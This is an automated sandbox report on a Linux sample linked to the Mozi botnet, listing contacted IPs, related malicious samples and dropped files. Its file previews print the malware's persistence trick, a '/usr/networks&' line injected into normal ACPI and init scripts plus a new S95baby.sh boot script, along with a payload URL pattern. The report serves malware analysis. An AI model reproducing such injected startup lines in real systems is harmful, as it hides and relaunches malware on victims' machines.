                                                unknownUnited States
                                                1761TDIR-CAPNETUSfalse
                                                219.15.149.67
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                65.173.118.23
                                                unknownUnited States
                                                11398CENTURYLINK-LEGACY-EMBARQ-LVGSUSfalse
                                                61.231.92.160
                                                unknownTaiwan; Republic of China (ROC)
                                                3462HINETDataCommunicationBusinessGroupTWfalse
                                                211.18.19.160
                                                unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                                132.204.24.45
                                                unknownCanada
                                                376RISQ-ASCAfalse
                                                1.207.152.148
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                219.47.162.234
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                3.146.148.144
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                163.246.109.119
                                                unknownUnited States
                                                3512EUSHCUSfalse
                                                135.233.240.19
                                                unknownUnited States
                                                10455LUCENT-CIOUSfalse
                                                8.195.49.95
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                178.175.121.49
                                                unknownMontenegro
                                                8661PTKPTKIPMPLSNetworkRSfalse
                                                49.0.203.86
                                                unknownMongolia
                                                38818YOKOUNANET-MN-AS-APYOKOZUNANETLLCMNfalse
                                                153.157.9.172
                                                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                                172.42.40.243
                                                unknownUnited States
                                                21928T-MOBILE-AS21928USfalse
                                                157.14.182.109
                                                unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                                                50.10.218.224
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                157.46.152.22
                                                unknownIndia
                                                55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                                                13.219.81.91
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                130.68.74.157
                                                unknownUnited States
                                                205MONTCLAIR-ASUSfalse
                                                74.18.244.100
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                207.67.91.44
                                                unknownUnited States
                                                30560GE-MS001USfalse
                                                110.192.131.42
                                                unknownChina
                                                9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                                100.182.99.144
                                                unknownUnited States
                                                21928T-MOBILE-AS21928USfalse
                                                94.31.145.150
                                                unknownRussian Federation
                                                35154TELENET-ASRUfalse
                                                222.48.163.26
                                                unknownChina
                                                9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                                16.98.151.230
                                                unknownUnited States
                                                unknownunknownfalse
                                                9.20.231.34
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                159.0.138.11
                                                unknownSaudi Arabia
                                                25019SAUDINETSTC-ASSAfalse
                                                89.61.117.218
                                                unknownGermany
                                                5430FREENETDEfreenetDatenkommunikationsGmbHDEfalse
                                                131.30.249.212
                                                unknownUnited States
                                                385AFCONC-BLOCK1-ASUSfalse
                                                208.228.127.61
                                                unknownUnited States
                                                11606WOL-ASUSfalse
                                                114.182.18.144
                                                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                                196.90.229.151
                                                unknownMorocco
                                                6713IAM-ASMAfalse
                                                218.231.43.124
                                                unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                                198.94.113.247
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                117.151.233.14
                                                unknownChina
                                                9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                43.245.138.132
                                                unknownIndia
                                                58640NEXTRA-INNEXTRATELESERVICESPVTLTDINfalse
                                                170.169.8.221
                                                unknownMexico
                                                2134GSVNET-ASGSVirtualNetworkProdubanESfalse
                                                147.22.206.236
                                                unknownUnited States
                                                10796TWC-10796-MIDWESTUSfalse
                                                119.197.149.98
                                                unknownKorea Republic of
                                                4766KIXS-AS-KRKoreaTelecomKRfalse
                                                157.245.145.71
                                                unknownUnited States
                                                14061DIGITALOCEAN-ASNUSfalse
                                                114.100.97.125
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                199.125.24.246
                                                unknownUnited States
                                                31770CMMC-I2USfalse
                                                105.162.120.29
                                                unknownKenya
                                                33771SAFARICOM-LIMITEDKEfalse
                                                86.104.41.235
                                                unknownIran (ISLAMIC Republic Of)
                                                25184AFRANETfromAS58267acceptAS58267IRfalse
                                                57.211.14.243
                                                unknownBelgium
                                                2686ATGS-MMD-ASUSfalse
                                                175.159.188.41
                                                unknownHong Kong
                                                4528HKU-AS-HKTheUniversityofHongKongHKfalse
                                                138.40.6.32
                                                unknownUnited Kingdom
                                                786JANETJiscServicesLimitedGBfalse
                                                139.130.197.234
                                                unknownAustralia
                                                1221ASN-TELSTRATelstraCorporationLtdAUfalse

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:397466
                                                Start date:25.04.2021
                                                Start time:20:58:14
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 11s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:MGuvcs6Ocz
                                                Cookbook file name:defaultlinuxfilecookbook.jbs
                                                Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                                Analysis Mode:default
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.lin@0/221@4/0
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.38, 91.189.92.20, 91.189.92.41, 91.189.92.39, 91.189.92.40, 91.189.92.19
                                                • HTTP Packets have been reduced
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • VT rate limit hit for: http://%s:%d/Mozi.m;$


                                                Runtime Messages

                                                Command:/tmp/MGuvcs6Ocz
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                qemu: uncaught target signal 4 (Illegal instruction) - core dumped
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                router.bittorrent.comq7uNNDJUI2.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BQGxKexU78.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                FhhkmGmDGr.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bin.shGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                iGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Mozi.mGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Photo.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                new.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.2 build 37754.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                dht.transmissionbt.comYPJ9DZYIpOGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                bin.shGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                iGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                Mozi.mGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                Photo.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                new.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                bttracker.acc.umu.seYPJ9DZYIpOGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                bin.shGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                iGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Mozi.mGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Photo.exeGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                new.exeGet hashmaliciousBrowse
                                                • 130.239.18.159

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                TelemarNorteLesteSABRz3hir.binGet hashmaliciousBrowse
                                                • 201.32.54.125
                                                bXSINeHUUZ.dllGet hashmaliciousBrowse
                                                • 201.50.39.83
                                                wNKeSASCDt.exeGet hashmaliciousBrowse
                                                • 187.40.163.29
                                                networkmanagerGet hashmaliciousBrowse
                                                • 186.242.175.186
                                                #U10e1#U10d0#U10e4#U10e0#U10d0#U10dc#U10d2#U10d4#U10d7#U10d8.exeGet hashmaliciousBrowse
                                                • 189.80.134.122
                                                0zwHgf4MZ6.exeGet hashmaliciousBrowse
                                                • 201.59.167.66
                                                849IlNGgPo.exeGet hashmaliciousBrowse
                                                • 201.59.167.66
                                                qttrjoVQp0.exeGet hashmaliciousBrowse
                                                • 201.59.167.66
                                                bin.shGet hashmaliciousBrowse
                                                • 201.8.221.107
                                                fil1Get hashmaliciousBrowse
                                                • 191.47.176.240
                                                fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                • 189.80.190.68
                                                B4UuMZDyI6.exeGet hashmaliciousBrowse
                                                • 177.177.101.236
                                                EDUDBD7khq.exeGet hashmaliciousBrowse
                                                • 189.105.1.233
                                                juice.exeGet hashmaliciousBrowse
                                                • 186.243.242.2
                                                newageGet hashmaliciousBrowse
                                                • 177.209.120.168
                                                Christopher Young_272034_assignsubmission_file_Christopher Young Activity submission 1.doc.exeGet hashmaliciousBrowse
                                                • 201.59.205.58
                                                73Voucher Hotel - SV 5985026.exeGet hashmaliciousBrowse
                                                • 189.24.240.134
                                                39Rooming_List.exeGet hashmaliciousBrowse
                                                • 179.199.117.152
                                                67Rooming_List01.exeGet hashmaliciousBrowse
                                                • 179.197.203.146
                                                49Rooming_List004.exeGet hashmaliciousBrowse
                                                • 189.24.183.164
                                                TELENET-ASBEYPJ9DZYIpOGet hashmaliciousBrowse
                                                • 94.226.138.77
                                                8WGKow4Gfb.exeGet hashmaliciousBrowse
                                                • 78.20.87.51
                                                fil1Get hashmaliciousBrowse
                                                • 195.17.178.2
                                                https://da.gd/0rangeGet hashmaliciousBrowse
                                                • 213.224.232.1
                                                networkserviceGet hashmaliciousBrowse
                                                • 141.135.139.143
                                                Wannacr.exeGet hashmaliciousBrowse
                                                • 94.225.86.113
                                                ttcv.exeGet hashmaliciousBrowse
                                                • 178.116.83.49
                                                CompanyComplaint.docGet hashmaliciousBrowse
                                                • 178.116.83.49
                                                sample.exeGet hashmaliciousBrowse
                                                • 178.116.83.49
                                                43document.exeGet hashmaliciousBrowse
                                                • 81.82.202.210
                                                62document.html .exeGet hashmaliciousBrowse
                                                • 84.199.73.5
                                                Tracking-Number.vbsGet hashmaliciousBrowse
                                                • 81.82.237.143
                                                Phot.exeGet hashmaliciousBrowse
                                                • 78.22.213.0
                                                16CGkw7xDOtb.exeGet hashmaliciousBrowse
                                                • 81.82.202.210
                                                36text.htm .exeGet hashmaliciousBrowse
                                                • 81.82.202.210
                                                GIGAINFRASoftbankBBCorpJPIMG001.exeGet hashmaliciousBrowse
                                                • 219.184.234.178
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 126.148.215.159
                                                KCCAfipQl2.dllGet hashmaliciousBrowse
                                                • 49.253.193.36
                                                MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                • 60.108.128.186
                                                Io8ic2291n.docGet hashmaliciousBrowse
                                                • 60.93.23.51
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 126.172.220.14
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 126.142.30.153
                                                WUHU95Apq3Get hashmaliciousBrowse
                                                • 126.248.249.117
                                                bin.shGet hashmaliciousBrowse
                                                • 221.65.136.75
                                                oHqMFmPndx.exeGet hashmaliciousBrowse
                                                • 221.65.97.214
                                                mssecsvr.exeGet hashmaliciousBrowse
                                                • 218.126.250.41
                                                mssecsvc.exeGet hashmaliciousBrowse
                                                • 219.38.241.57
                                                iGet hashmaliciousBrowse
                                                • 126.3.151.91
                                                Mozi.mGet hashmaliciousBrowse
                                                • 220.42.145.217
                                                NormhjTcQb.exeGet hashmaliciousBrowse
                                                • 219.7.160.234
                                                xJbFpiVs1lGet hashmaliciousBrowse
                                                • 126.168.139.190
                                                SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                • 60.130.86.188
                                                RB1NsQ9LQf.exeGet hashmaliciousBrowse
                                                • 219.40.58.2
                                                QtieMVP6yx.exeGet hashmaliciousBrowse
                                                • 60.125.114.64
                                                8jpKEFc5Ow.exeGet hashmaliciousBrowse
                                                • 60.125.114.64

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                /etc/init.d/S95baby.shmozi.a.zipGet hashmaliciousBrowse
                                                  bin.shGet hashmaliciousBrowse
                                                    iGet hashmaliciousBrowse
                                                      Mozi.mGet hashmaliciousBrowse
                                                        Mozi.mGet hashmaliciousBrowse
                                                          1skm346XtzGet hashmaliciousBrowse
                                                            Mozi.aGet hashmaliciousBrowse
                                                              Mozi.1.mGet hashmaliciousBrowse
                                                                6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                  7v1ic5IS8IGet hashmaliciousBrowse
                                                                    Mozi.aGet hashmaliciousBrowse
                                                                      Mozi.aGet hashmaliciousBrowse
                                                                        Mozi.mGet hashmaliciousBrowse
                                                                          Mozi.mGet hashmaliciousBrowse
                                                                            Mozi.mGet hashmaliciousBrowse
                                                                              bad_fileGet hashmaliciousBrowse
                                                                                mxjzQQFgLpGet hashmaliciousBrowse
                                                                                  JrAL1wW1MQGet hashmaliciousBrowse
                                                                                    /etc/rcS.d/S95baby.shmozi.a.zipGet hashmaliciousBrowse
                                                                                      bin.shGet hashmaliciousBrowse
                                                                                        iGet hashmaliciousBrowse
                                                                                          Mozi.mGet hashmaliciousBrowse
                                                                                            Mozi.mGet hashmaliciousBrowse
                                                                                              1skm346XtzGet hashmaliciousBrowse
                                                                                                Mozi.aGet hashmaliciousBrowse
                                                                                                  Mozi.1.mGet hashmaliciousBrowse
                                                                                                    6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                                      7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                        Mozi.aGet hashmaliciousBrowse
                                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                                            Mozi.mGet hashmaliciousBrowse
                                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                                  bad_fileGet hashmaliciousBrowse
                                                                                                                    mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                                      JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        /boot/grub/i386-pc/modinfo.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):326
                                                                                                                        Entropy (8bit):5.2904323771702915
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                                        /etc/acpi/asus-wireless.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):157
                                                                                                                        Entropy (8bit):4.412729940630044
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                                        /etc/acpi/ibm-wireless.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):636
                                                                                                                        Entropy (8bit):4.722087767454589
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                                        /etc/acpi/powerbtn.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2079
                                                                                                                        Entropy (8bit):4.778187000249208
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                                        MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                                        SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                                        SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                                        SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                                        /etc/acpi/tosh-wireless.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):483
                                                                                                                        Entropy (8bit):4.215331622973397
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                                        MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                                        SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                                        SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                                        SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                                        /etc/acpi/undock.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.77497394042067
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                                        MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                                        SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                                        SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                                        SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                                        /etc/bash_completion.d/libreoffice.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /etc/init.d/S95baby.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):25
                                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                        Malicious:true
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                        • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                        • Filename: i, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                        • Filename: bad_file, Detection: malicious, Browse
                                                                                                                        • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                                        /etc/init.d/bootmisc.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):148
                                                                                                                        Entropy (8bit):4.718194263525147
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                                        MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                                        SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                                        SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
